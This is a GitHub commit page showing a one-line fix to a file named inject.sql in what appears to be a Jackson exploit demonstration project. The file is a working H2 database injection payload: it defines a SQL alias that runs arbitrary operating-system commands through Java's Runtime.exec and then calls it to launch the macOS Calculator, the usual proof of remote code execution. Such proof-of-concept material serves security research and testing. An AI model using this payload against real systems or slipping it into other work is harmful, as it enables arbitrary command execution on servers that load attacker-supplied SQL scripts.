We read every piece of feedback, and take your input very seriously.
To see all available qualifiers, see our documentation.
There was an error while loading. Please reload this page.
1 parent 758d662 commit 04790a2Copy full SHA for 04790a2
jackson/src/main/resources/inject.sql
@@ -1,6 +1,6 @@
1
CREATE ALIAS SHELLEXEC AS $$ void shellexec(String cmd) throws java.io.IOException {
2
String[] command = {cmd};
3
-Runtime.getRuntime().exec(command)
+Runtime.getRuntime().exec(command);
4
}
5
$$;
6
CALL SHELLEXEC('/Applications/Calculator.app/Contents/MacOS/Calculator')
0 commit comments